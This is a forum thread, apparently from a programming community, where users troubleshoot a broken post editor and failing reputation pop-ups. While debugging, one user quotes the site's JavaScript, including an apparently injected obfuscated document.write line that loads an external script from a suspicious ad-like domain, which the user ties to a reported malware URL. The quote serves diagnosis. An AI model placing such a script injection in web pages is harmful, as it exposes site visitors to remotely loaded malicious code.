Good for you then ;) In the mean time, I'm going to write myself simple "DIC post" editor in VB.NET...
I'm sure this is just temporary issue.

Edit:
In case anyone needs temporary solution, here's the code in VB.NET

Hey guys!

After waiting about 3 days, I have to start this topic...

Actually from 3 days I'm having problem with the quick editor. I'm using firefox browser, and what actually happens is, when I write some stuff in the editor and switch to another tab or minimize the browser windows and restore the browser or the tab the stuff I wrote in the editor disappears and then I have to press ctrl + z to retrieve it...

Besides that, when things were fine :P I used to select some text and click the B to make them bold or just use to press ctrl + b to make them bold, but none of them works now... Also I think some buttons are missing from the quick editor, like inline...

What might be the problem?

I've merged your topic with another ongoing thread about this same issue. I've also renamed this thread to more accurately reflect what the issue is.

I personally don't have the permissions to fix these issues. However, I have made skyhawk133 aware of them.

I'm honestly not sure what's wrong, not a javascript guy. It looks like some sort of on:focus issue or something, but we've had the same code for years without problems, so not sure why all of a sudden it would stop working.

Can anyone having the problem debug the issue and provide some insight in to what might be causing it? Does disabling ads/other scripts fix it?

I'm out of town this week without access to my main system and debugging tools, so any info you guys can provide to help track this down would be great.

If I click the rep bubble next to the post, I get an error in Firebug:

ipb.topic is undefined for this code:

function onclick(event) {
ipb.topic.repPopUp(this, 1741258);
}

The full onclick handler code includes a second identical call:

function onclick(event) {
ipb.topic.repPopUp(this, 1741258);
}
function anonymous() {
ctl00_ctl00_bcr_bcr_ctl00_PostList_ctl02_ctl18_ctl00._windowonunload();
}
function onclick(event) {
ipb.topic.repPopUp(this, 1741258);
}

More forthcoming.

EDIT: Maybe the malware URL reported is related. On viewing a topic I get

"ad is not defined"

On this line:

{return $(this.wrapper);}});ipb=new IPBoard;ipb.global.init();ipb.menus.init();document.write(unescape("%3Cscript%20src=%22http"+(("https:"==document.location.protocol)?"":"")+"://>/"+ad+"."+ad+"googleads.com/"+ad+".js%22%3E%3C/script%3E"));;var _quickpm=window.IPBoard;_quickpm.prototype.quickpm=

Note the url being used in the document.write call.

I'm having the exact same issue. I can type but if I try to use any buttons nothing happens and a click back into the QuickEdit window or the full edit window removes anything I've typed. I tried Ad-Block on and off to no avail. I'm going to shut down add-ons and see if I come up with something.

Similar problems are reported by AdamSpeight2008 here, and I've expirienced it myself today, when I was saving my newest blog entry about this topic, and providing quick VB.NET editor code solution for it.

Well! At last found a thread about my problem... :P

Guys, I have started a topic more than a hour ago and it got disappeared, even it doesn't show in my profile... Anyhow it was about the same problem and now I found this thread...

From 3 days I'm having some serious problem with the quick editor maybe the full editor would mess too. I'm using firefox and when I switch to another tab or minimize the page and restore back the page or to the tab the stuff I wrote in the editor disappears, then I have to press ctrl + z to retrieve it. Also, the shortcuts are not working, like, I used to select the text and press ctrl + b to bold, even if I select the text and click the bold button it doesn't works until I do it manually... Other than I see some buttons are missing, like, the inline...

And yes, when I click on someone's reputation in a post, the pop up balloon doesn't appears which displays who has given the reputation...

Well! All this is happening with me from 3 days...

That's because I merged your post into this thread, as mentioned about ten posts ago.

Ah Sorry about multiple posts... Curtis Rutland I didn't noticed that you have merged my thread. BTW, Well done for merging the threads... When I saw this thread I was wondering how my thread belongs to someone else, then looking at the replies I was sure it not mine, but still amazed that how can two threads have exactly the same title, even the number of dots in the end... :P

Please Admins and Moderators please let the OP know of such actions, so he/she might not be wondering that where does his thread disappeared... :P

I'm trying to make a go of my new Win8 installation.
I'm having issues with DIC however, on all browsers: IE8, Safari, Chrome.

  • Text in the textbox clears itself frequently when clicking out of browser and back, or just going to copy part of another post then back in the editing textbox. I've been writing all my replies in an open TextEditor window then pasting in the browser with a quick click of [Post] before it evaporates.
  • Can't attach an image using Flash or classic file uploader.
  • Formatting buttons (code, IL) don't insert tags. In IE8 the full text and tag is inserted but at the head of the text not at the cursor position.

I saw some mention of the disappearing text in another thread... So the question is: Is this happening to people in Win7?

Note: I was going to add a poll so people on 7 and 8 could indicate... but that feature also is not working. Maybe its just off for this forum. I dunno.
